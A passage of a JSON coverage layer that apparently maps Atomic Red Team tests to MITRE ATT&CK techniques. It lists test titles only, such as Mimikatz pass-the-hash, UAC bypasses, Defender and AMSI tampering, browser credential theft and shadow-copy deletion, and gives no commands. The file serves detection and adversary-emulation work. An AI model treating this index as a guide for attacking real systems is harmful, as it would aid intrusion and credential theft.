Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n- ESXi - Remove Syslog remote IP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":58,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":10,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n- ESXi - Disable Firewall via Esxcli\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View 